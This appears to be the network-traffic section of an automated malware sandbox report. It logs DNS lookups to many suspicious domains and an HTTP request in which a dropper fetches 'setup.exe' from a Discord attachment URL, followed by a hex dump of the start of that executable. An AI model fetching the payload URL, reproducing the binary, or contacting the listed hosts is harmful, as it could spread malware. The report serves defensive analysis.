                                                                              Oct 26, 2023 09:47:13.097755909 CEST192.168.2.71.1.1.10x88aeStandard query (0)www.kimgj.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:14.112648010 CEST192.168.2.71.1.1.10x88aeStandard query (0)www.kimgj.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:17.409799099 CEST192.168.2.71.1.1.10xdcbdStandard query (0)www.viteview.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:18.675560951 CEST192.168.2.71.1.1.10x500eStandard query (0)www.peakvitality.fitnessA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:31.347352028 CEST192.168.2.71.1.1.10xd36cStandard query (0)www.dulcestipicos.madridA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:33.441793919 CEST192.168.2.71.1.1.10xcea1Standard query (0)www.kjnala.shopA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:34.441783905 CEST192.168.2.71.1.1.10xcea1Standard query (0)www.kjnala.shopA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:38.722184896 CEST192.168.2.71.1.1.10x7400Standard query (0)www.pathlightpropertiesmgt.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:41.065701008 CEST192.168.2.71.1.1.10x6b51Standard query (0)fresh1.ironoreprod.topA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:45.331954002 CEST192.168.2.71.1.1.10xb0e8Standard query (0)www.yektakhodro.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:49.988535881 CEST192.168.2.71.1.1.10xf600Standard query (0)h171145.srv22.test-hf.suA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:50.987302065 CEST192.168.2.71.1.1.10xf600Standard query (0)h171145.srv22.test-hf.suA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:54.597379923 CEST192.168.2.71.1.1.10xed57Standard query (0)www.thwmlohr.clickA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:02.940979958 CEST192.168.2.71.1.1.10xe172Standard query (0)www.indococoexports.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:05.489264011 CEST192.168.2.71.1.1.10x231aStandard query (0)butchane.funA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:07.724972963 CEST192.168.2.71.1.1.10x8d10Standard query (0)www.tcbbuilds.comA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:07.958300114 CEST192.168.2.71.1.1.10x9844Standard query (0)china.dhabigroup.topA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:08.916906118 CEST192.168.2.71.1.1.10x57f9Standard query (0)img.proxies.worldA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 26, 2023 09:45:51.789334059 CEST1.1.1.1192.168.2.70xde3fNo error (0)urlhaus.abuse.chp2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2023 09:45:54.126614094 CEST1.1.1.1192.168.2.70x4732No error (0)china.dhabigroup.top172.67.132.61A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:45:54.126614094 CEST1.1.1.1192.168.2.70x4732No error (0)china.dhabigroup.top104.21.4.159A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:45:58.163600922 CEST1.1.1.1192.168.2.70x451cNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:45:58.163600922 CEST1.1.1.1192.168.2.70x451cNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:45:58.163600922 CEST1.1.1.1192.168.2.70x451cNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:45:58.163600922 CEST1.1.1.1192.168.2.70x451cNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:45:58.163600922 CEST1.1.1.1192.168.2.70x451cNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:01.207231045 CEST1.1.1.1192.168.2.70xef3No error (0)whitecatcorn.com8.29.155.210A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:02.042918921 CEST1.1.1.1192.168.2.70x752aNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:20.255913973 CEST1.1.1.1192.168.2.70x33f2No error (0)www.mantap89.online172.67.196.229A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:20.255913973 CEST1.1.1.1192.168.2.70x33f2No error (0)www.mantap89.online104.21.68.166A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:35.835387945 CEST1.1.1.1192.168.2.70xcad4No error (0)www.bradslinkard.com192.64.119.8A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:38.668499947 CEST1.1.1.1192.168.2.70xa8f0No error (0)www.collibrishop.onlinecollibrishop.onlineCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:38.668499947 CEST1.1.1.1192.168.2.70xa8f0No error (0)collibrishop.online50.116.112.43A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:49.522509098 CEST1.1.1.1192.168.2.70x5271No error (0)www.hotelunivers84.com38.60.119.195A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:53.796205997 CEST1.1.1.1192.168.2.70xde15No error (0)www.vaskaworldairways.comfletchto99.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:53.796205997 CEST1.1.1.1192.168.2.70xde15No error (0)fletchto99.com71.33.141.248A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:59.853705883 CEST1.1.1.1192.168.2.70xe437No error (0)www.lpqxmz.site103.120.80.111A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:46:59.853735924 CEST1.1.1.1192.168.2.70xe437No error (0)www.lpqxmz.site103.120.80.111A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:03.711991072 CEST1.1.1.1192.168.2.70xaa25No error (0)www.lesresort.shop195.24.68.17A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:14.281512022 CEST1.1.1.1192.168.2.70x88aeNo error (0)www.kimgj.comkimgj.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:14.281512022 CEST1.1.1.1192.168.2.70x88aeNo error (0)kimgj.com99.83.196.71A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:14.281512022 CEST1.1.1.1192.168.2.70x88aeNo error (0)kimgj.com75.2.85.42A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:14.281580925 CEST1.1.1.1192.168.2.70x88aeNo error (0)www.kimgj.comkimgj.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:14.281580925 CEST1.1.1.1192.168.2.70x88aeNo error (0)kimgj.com99.83.196.71A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:14.281580925 CEST1.1.1.1192.168.2.70x88aeNo error (0)kimgj.com75.2.85.42A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:17.581758022 CEST1.1.1.1192.168.2.70xdcbdNo error (0)www.viteview.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:17.581758022 CEST1.1.1.1192.168.2.70xdcbdNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:18.993701935 CEST1.1.1.1192.168.2.70x500eNo error (0)www.peakvitality.fitnessshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:18.993701935 CEST1.1.1.1192.168.2.70x500eNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:31.768671989 CEST1.1.1.1192.168.2.70xd36cNo error (0)www.dulcestipicos.madrid217.76.128.47A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:34.724421978 CEST1.1.1.1192.168.2.70xcea1Server failure (2)www.kjnala.shopnonenoneA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:34.724435091 CEST1.1.1.1192.168.2.70xcea1Server failure (2)www.kjnala.shopnonenoneA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:38.947041988 CEST1.1.1.1192.168.2.70x7400No error (0)www.pathlightpropertiesmgt.compathlightpropertiesmgt.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:38.947041988 CEST1.1.1.1192.168.2.70x7400No error (0)pathlightpropertiesmgt.com3.33.130.190A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:38.947041988 CEST1.1.1.1192.168.2.70x7400No error (0)pathlightpropertiesmgt.com15.197.148.33A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:41.676212072 CEST1.1.1.1192.168.2.70x6b51No error (0)fresh1.ironoreprod.top172.67.166.168A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:41.676212072 CEST1.1.1.1192.168.2.70x6b51No error (0)fresh1.ironoreprod.top104.21.16.60A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:45.790576935 CEST1.1.1.1192.168.2.70xb0e8No error (0)www.yektakhodro.comyektakhodro.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:45.790576935 CEST1.1.1.1192.168.2.70xb0e8No error (0)yektakhodro.com94.130.16.79A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:51.124736071 CEST1.1.1.1192.168.2.70xf600No error (0)h171145.srv22.test-hf.su91.227.16.22A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:51.124758005 CEST1.1.1.1192.168.2.70xf600No error (0)h171145.srv22.test-hf.su91.227.16.22A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:47:55.320785999 CEST1.1.1.1192.168.2.70xed57No error (0)www.thwmlohr.click43.154.67.170A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:03.922565937 CEST1.1.1.1192.168.2.70xe172No error (0)www.indococoexports.comindococoexports.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:03.922565937 CEST1.1.1.1192.168.2.70xe172No error (0)indococoexports.com123.100.226.163A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:05.591296911 CEST1.1.1.1192.168.2.70x231aNo error (0)butchane.fun104.21.1.169A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:05.591296911 CEST1.1.1.1192.168.2.70x231aNo error (0)butchane.fun172.67.129.166A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:07.958240986 CEST1.1.1.1192.168.2.70x8d10Server failure (2)www.tcbbuilds.comnonenoneA (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:08.070281982 CEST1.1.1.1192.168.2.70x9844No error (0)china.dhabigroup.top172.67.132.61A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:08.070281982 CEST1.1.1.1192.168.2.70x9844No error (0)china.dhabigroup.top104.21.4.159A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:09.073705912 CEST1.1.1.1192.168.2.70x57f9No error (0)img.proxies.world172.67.130.17A (IP address)IN (0x0001)false
                                                                              Oct 26, 2023 09:48:09.073705912 CEST1.1.1.1192.168.2.70x57f9No error (0)img.proxies.world104.21.3.24A (IP address)IN (0x0001)false
                                                                              • cdn.discordapp.com
                                                                              • 172.245.208.6
                                                                              • china.dhabigroup.top
                                                                              • 141.98.10.13
                                                                              • www.mantap89.online
                                                                              • www.bradslinkard.com
                                                                              • www.collibrishop.online
                                                                              • www.hotelunivers84.com
                                                                              • www.vaskaworldairways.com
                                                                              • www.lpqxmz.site
                                                                              • www.lesresort.shop
                                                                              • www.kimgj.com
                                                                              • www.viteview.com
                                                                              • www.peakvitality.fitness
                                                                              • www.dulcestipicos.madrid
                                                                              • www.pathlightpropertiesmgt.com
                                                                              • fresh1.ironoreprod.top
                                                                              • 77.91.68.249
                                                                              • www.yektakhodro.com
                                                                              • h171145.srv22.test-hf.su
                                                                              • 103.39.124.209
                                                                              • 103.72.68.128
                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.749709162.159.129.233443C:\Users\user\Desktop\New_Text_Document.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              2023-10-26 07:45:58 UTC0OUTGET /attachments/1162840103530528921/1164891114868834355/setup.exe HTTP/1.1
                                                                              Host: cdn.discordapp.com
                                                                              Connection: Keep-Alive
                                                                              2023-10-26 07:45:58 UTC0INHTTP/1.1 200 OK
                                                                              Date: Thu, 26 Oct 2023 07:45:58 GMT
                                                                              Content-Type: application/x-msdos-program
                                                                              Content-Length: 10177592
                                                                              Connection: close
                                                                              CF-Ray: 81c11534ebd78f23-IAD
                                                                              CF-Cache-Status: MISS
                                                                              Accept-Ranges: bytes
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Disposition: attachment; filename="setup.exe"
                                                                              ETag: "8a22c4b4e8b911a51322dfd78fe799c4"
                                                                              Expires: Fri, 25 Oct 2024 07:45:58 GMT
                                                                              Last-Modified: Fri, 20 Oct 2023 11:41:24 GMT
                                                                              Vary: Accept-Encoding
                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                              x-goog-generation: 1697802084530520
                                                                              x-goog-hash: crc32c=vty9ew==
                                                                              x-goog-hash: md5=iiLEtOi5EaUTIt/Xj+eZxA==
                                                                              x-goog-metageneration: 1
                                                                              x-goog-storage-class: STANDARD
                                                                              x-goog-stored-content-encoding: identity
                                                                              x-goog-stored-content-length: 10177592
                                                                              X-GUploader-UploadID: ABPtcPrip8bdfye_kf9jvh1SCgoTwsgW2NU-jBttl2BdzZhKrFJtePmgMT8y0IgZ9w3x7LwMpT09rJhNXdVvlcqmY6uaQQ
                                                                              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                              Set-Cookie: __cf_bm=iODSeIgeTFuRkCZKO7ho9HFxlemOBnjNzMRQdqVDRT8-1698306358-0-Ab+vwOgh124lVxsgO8r2C5VtZaJw3gFRxFqKld8nnl/29QvgpvAbUIugZvionvjirWnJPCtOVnOWkBC1Roi9ZXw=; path=/; expires=Thu, 26-Oct-23 08:15:58 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                              2023-10-26 07:45:58 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 58 34 42 46 74 25 32 42 45 48 65 66 58 77 59 6b 70 74 52 48 6a 4f 48 51 31 55 4a 52 46 4b 61 70 39 61 6d 6f 5a 44 71 4d 47 36 6e 64 46 52 4b 61 43 57 59 47 39 73 35 7a 52 73 37 4a 25 32 46 39 6f 4d 33 4d 50 62 6c 6e 57 57 6f 64 6b 4a 56 70 4b 30 4b 63 44 6a 45 72 4f 65 6c 6a 4d 4d 32 35 36 69 72 6e 30 4e 53 7a 75 42 77 4a 63 7a 63 43 71 50 51 25 32 42 6b 39 34 49 65 52 47 68 32 4c 5a 31 32 67 70 46 61 57 64 63 55 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X4BFt%2BEHefXwYkptRHjOHQ1UJRFKap9amoZDqMG6ndFRKaCWYG9s5zRs7J%2F9oM3MPblnWWodkJVpK0KcDjErOeljMM256irn0NSzuBwJczcCqPQ%2Bk94IeRGh2LZ12gpFaWdcUw%3D%3D"}],"group":"cf-nel","max_age":
                                                                              2023-10-26 07:45:58 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 11 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 28 00 b4 00 00 00 d0 98 00 00 32 00 00 60 11 ee 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 1d 01 00 06 00 00 4a f0 9b 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.(2`@J`
                                                                              2023-10-26 07:45:58 UTC2INData Raw: 00 00 10 00 00 00 e0 1d 01 10 00 00 00 00 00 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: @
                                                                              2023-10-26 07:45:58 UTC4INData Raw: c9 45 8b 32 30 63 a9 ea 61 fa c6 50 a5 e6 a1 e0 70 e7 d5 32 a1 94 6c 10 a9 36 1f 31 f6 7d 45 78 66 94 e7 04 cc 52 49 bc 9d 77 79 36 f9 d6 6d 04 f2 e9 48 c9 71 88 45 54 65 9b d3 7c c5 8f 4c 2a f0 75 36 90 31 84 56 c4 86 7d b6 dc 49 dc eb 03 99 39 79 4a 15 de b7 fc 47 8b cd 6a 88 92 36 cd 83 e6 59 86 74 de bb 39 77 65 67 1c 69 e0 76 82 ed f9 ad 3f dc da 68 d0 f1 cd 1a e4 91 da 99 ce e1 7e 15 99 72 b4 3f f8 36 71 29 17 3b 32 2b ab 6e 6b 73 04 ab 36 ff 11 2a 8c 32 c8 2d 27 75 5a 04 a8 69 95 5d ab b4 d1 36 48 7b 7e 28 ab ed 95 5b ea 36 82 a3 de 8e 98 9f 50 aa 83 60 66 8c 34 83 46 60 d4 f1 ed 44 90 61 aa 36 d3 ce 73 7f 21 71 99 ed 64 b9 55 af c4 6b 29 bc 4c 47 53 4b 07 f9 8d 9d 97 05 8b 39 b0 d9 df ac df dc c2 d9 39 f8 5f 46 7c 46 5d 57 e7 99 6e e5 33 6d 06 5b
                                                                              Data Ascii: E20caPp2l61}ExfRIwy6mHqETe|L*u61V}I9yJGj6Yt9wegiv?h~r?6q);2+nks6*2-'uZi]6H{~([6P`f4F`Da6s!qdUk)LGSK99_F|F]Wn3m[
                                                                              2023-10-26 07:45:58 UTC5INData Raw: 64 b6 d0 11 fd 89 26 14 f1 e1 63 65 42 48 7c 72 b2 a5 59 09 06 12 be 77 a6 7e 26 03 f6 de 4c 67 d8 d1 0e 38 ae ec 62 42 1e 24 ab 66 3e f1 25 c4 86 a1 cd a5 d3 f0 c0 4a d6 73 00 74 46 fe b2 c8 da 77 91 55 79 49 d4 0e 43 f8 50 3f cb 48 96 f1 6f c9 db d1 7f 29 b0 23 66 0b b0 d1 b8 1f 27 f4 e2 46 a8 c5 3b 9f 70 7f 79 64 04 cf 9c 09 bd 70 ba a1 cb 31 66 e5 25 8c 80 9b b4 02 08 0b d1 71 ef 00 d2 f6 a5 f4 b3 04 d1 35 bf 86 84 75 76 25 37 fc 82 6e 9e a5 2c d5 98 0a 6a 6f b8 36 c6 2a d6 4e 9f 4a e7 8d 54 c9 6e 88 c8 3d a9 46 02 61 7d f4 c0 9b a5 ef b8 1d fa 4c f8 c8 d6 61 a4 12 1e 79 21 63 f5 2b 11 9c 76 e8 4c af 3e 15 57 03 da 38 00 55 71 1c 94 b1 16 17 ca d3 e4 83 19 22 17 1d 29 24 6b 64 b2 8c 3f 2a 20 ff 38 e8 d4 07 8f 1f 49 f7 98 3a 21 c8 81 39 7d e2 94 54 20
                                                                              Data Ascii: d&ceBH|rYw~&Lg8bB$f>%JstFwUyICP?Ho)#f'F;pydp1f%q5uv%7n,jo6*NJTn=Fa}Lay!c+vL>W8Uq")$kd?* 8I:!9}T
                                                                              2023-10-26 07:45:58 UTC6INData Raw: 42 c1 2c 1a 79 1e 7c 8e 4a d0 e1 aa 93 b6 19 a3 9a cb 39 96 68 f7 16 13 f8 4a 22 bc 79 2c 6a e8 fb 89 d6 19 87 14 5d 3f e4 d2 10 e6 02 a0 0a 9a f7 c8 3a 3f 84 66 a6 af db a0 32 6f 58 98 47 86 f6 46 69 31 0e c4 49 88 3f 25 4a ff 66 a4 23 9a 15 fb 94 d9 55 6c 5f 3f ce 1b 8e ca a9 27 27 98 0f 57 ca 54 17 31 1d 86 e1 c1 f4 41 3e 44 6d f6 f5 ce 23 36 b0 30 ea 9c b1 de ea 59 d5 46 24 d3 a5 81 9c b4 b8 08 9d 5c 6a 26 e3 7b f5 3e b9 18 5c bd ec e5 43 d0 e3 f9 3e 87 c1 78 52 ca 30 8c 35 20 e3 e4 36 50 d3 76 63 87 11 1e 66 39 31 75 48 a0 c5 c6 a1 c0 6b da be 28 b9 38 da e6 a9 6a 66 fa 74 65 af fc 9f c1 a7 02 61 4c 80 08 0b c5 c9 be 78 da e4 25 3a 77 d1 96 5f e2 59 75 f1 77 47 7f d1 82 45 7d 6f 32 a6 6b 01 c5 4d 42 d2 76 44 63 31 3a 86 72 06 90 2a c0 51 9e 35 6d c6
                                                                              Data Ascii: B,y|J9hJ"y,j]?:?f2oXGFi1I?%Jf#Ul_?''WT1A>Dm#60YF$\j&{>\C>xR05 6Pvcf91uHk(8jfteaLx%:w_YuwGE}o2kMBvDc1:r*Q5m
                                                                              2023-10-26 07:45:58 UTC8INData Raw: 90 9b 88 72 00 80 e3 76 41 26 7f 62 0a 29 6d f7 8f e1 14 36 42 2a 4d fe 01 f1 59 68 2b f0 bf 95 10 a3 57 71 4d 1a 20 9a 77 c5 32 7c 3e a6 db 31 90 04 e3 0d 16 95 d6 04 6f ca d1 b1 e2 09 1f b8 09 22 7b 26 14 47 98 3b c9 e5 63 de 07 74 07 ba c4 af 0f 22 40 6a 8f 43 58 5c 5e bd 8c 6e 62 79 c1 33 7f 39 28 55 36 67 95 99 a0 9d 56 56 e2 c6 28 2b 84 b6 e7 0a 1a b9 b6 45 6a c8 72 69 2b b1 71 b3 5c 2a 3e aa 22 3c 21 e7 20 38 28 0c 7d b1 d0 b1 26 92 53 3e d3 52 80 59 4b 5a 28 3c 87 2e fe f4 6b 7c 61 44 57 26 12 56 8f 0e 9a 49 57 b8 27 81 a7 36 8c 40 aa 49 84 51 b6 89 90 16 bc 84 aa 51 f4 ab f2 4c ef 60 d2 98 6b 8d ac 69 50 39 06 81 08 1e d1 4d 5f f2 89 6c b3 2c 4d 6e 9c 2d 7d f7 58 8b 85 03 e1 29 6a e8 75 66 52 2d b9 f6 9f 4e 5e 4e 09 a5 60 69 1a 2b d6 2c 93 cc 6c
                                                                              Data Ascii: rvA&b)m6B*MYh+WqM w2|>1o"{&G;ct"@jCX\^nby39(U6gVV(+Ejri+q\*>"<! 8(}&S>RYKZ(<.k|aDW&VIW'6@IQQL`kiP9M_l,Mn-}X)jufR-N^N`i+,l
                                                                              2023-10-26 07:45:58 UTC9INData Raw: 7c 3e ab 28 95 65 88 32 c0 1b 4e 1f cd 97 1d 6e 5a 7a ed 90 cc 31 a6 29 9e 86 67 a4 dc 92 a9 2e 7a 86 7d 4f b2 e2 ca 43 d1 41 34 f1 11 b4 e2 da d7 6c d6 e1 fd a5 7c ee 06 29 d0 65 80 e3 8a 42 99 96 7e 4e 01 5b 30 b0 c9 13 20 32 84 eb 45 d6 a1 8e a9 1b 55 92 c6 b2 e2 7b cf 52 4e 26 f8 3a d1 f6 e4 50 61 3e e7 92 ef e4 4b 02 86 c9 81 d8 b1 80 f5 c2 63 c7 b0 7e 2b be 29 7c e4 b7 56 56 61 51 0e c6 a5 cf 10 03 d3 d6 ba 95 2d a8 19 19 ab ca d6 f7 f8 b9 d9 f2 a9 20 d2 13 8e 15 9f ad c3 9a 52 6e 2c 36 7e 55 6f 60 0d 43 9c f7 c0 89 09 e8 eb 93 f1 48 de 0f 23 1a a8 28 ed 63 81 d1 48 51 2e 64 1e 9a 7d 67 d3 da 11 1d 53 1a 2b cc 81 46 ec 06 16 d8 92 d2 fd 67 66 f9 f9 87 f8 32 73 d1 81 59 f8 d5 dc e1 0a ce 70 d0 89 2f a0 b8 10 78 cd 21 b7 29 6f ae 4f f1 e9 4b 6a 59 98
                                                                              Data Ascii: |>(e2NnZz1)g.z}OCA4l|)eB~N[0 2EU{RN&:Pa>Kc~+)|VVaQ- Rn,6~Uo`CH#(cHQ.d}gS+Fgf2sYp/x!)oOKjY
                                                                              2023-10-26 07:45:58 UTC10INData Raw: 58 81 63 21 3a e0 08 e4 b5 af 81 12 61 4f e2 91 46 b1 5d ab 86 4b d8 cf 31 9a 56 34 0e cf 8e d8 60 f6 de 52 91 db df 0a e7 e6 4a 95 af 2d ce 0d f8 49 a3 06 98 55 c4 0c 6e 59 a4 6d 79 5d a8 e9 91 91 ca c9 d9 be a3 21 6e 7e 48 25 ce 63 82 11 b0 b7 5b bf 80 55 57 b3 a7 3d f3 08 86 85 13 6e d7 2a f8 b5 f2 ff 81 f1 f9 be 88 f8 c5 6a c8 31 58 63 8d 6e a7 39 61 a8 59 4d 82 ed d6 0e 89 5e f5 4a 41 a1 32 1d 60 22 a3 ee 60 e4 32 5f 1c 56 70 eb 5e 29 5a 6e 93 09 6a 68 89 e7 8e e6 b4 ed 31 79 52 52 5f 9a d9 2e 67 61 a8 74 43 b1 d7 cb a7 9f 58 0e 99 73 82 d2 82 35 df 04 8e 8e 9b f0 1a 6c ea ed 65 35 7c a3 a3 26 01 e4 71 35 56 ef 18 ab 8d f7 57 9e 60 6a 83 39 e9 06 ee de d0 7a 5f 8a 3c 2a 04 bd e4 cc 7e df b4 31 52 e6 7a 2a 6e e6 44 e9 18 28 07 dd 50 35 36 bc 81 40 c1
                                                                              Data Ascii: Xc!:aOF]K1V4`RJ-IUnYmy]!n~H%c[UW=n*j1Xcn9aYM^JA2`"`2_Vp^)Znjh1yRR_.gatCXs5le5|&q5VW`j9z_<*~1Rz*nD(P56@
                                                                              2023-10-26 07:45:58 UTC12INData Raw: 07 3c 55 aa 35 80 a1 15 16 8d 79 6b 6f 42 29 7b 45 86 19 1a 6b 80 b6 5a a4 67 d5 76 e5 88 e4 72 4e fe a0 3c 2a 8b e9 9e d2 7b fa a8 35 10 1e 6c f4 a4 f5 69 28 98 a8 37 7e c2 87 af 92 01 c5 5b 94 cb 40 00 1f 1a e6 3c 19 e5 cd f7 07 96 5b ce da 2e 88 0a 82 56 21 5a 83 9d a0 9b 34 c5 9e 77 71 a2 1f a3 eb 98 a5 85 2b 24 29 9e 90 6e 35 88 34 00 e9 35 16 29 06 5e ba 50 bc e1 5a 94 9d 21 af 69 f6 7f b5 7e d8 43 1c 1f 9b b9 4e 11 06 5c e9 a4 7e 1b 42 45 f3 55 41 c3 da 5d 34 ce 43 05 c3 cb e3 b1 29 f0 ff 60 a3 50 c7 98 8e 44 e7 95 16 04 ed f7 df 94 12 6d ff e4 de 63 e9 cc 1e ef 77 40 b4 bb 1d 2c e9 d8 75 bb d5 ca 9d 6c d4 ba 97 4f d9 c7 c5 7e 2c 5a d5 b8 29 97 2f 14 88 e9 79 ba 70 72 1e 44 de da 6a 38 c9 3d d6 11 cc 6b fb cb 34 a7 71 fd 6d 6d bc 8e 6a 9f 1a 0e 51
                                                                              Data Ascii: <U5ykoB){EkZgvrN<*{5li(7~[@<[.V!Z4wq+$)n545)^PZ!i~CN\~BEUA]4C)`PDmcw@,ulO~,Z)/yprDj8=k4qmmjQ
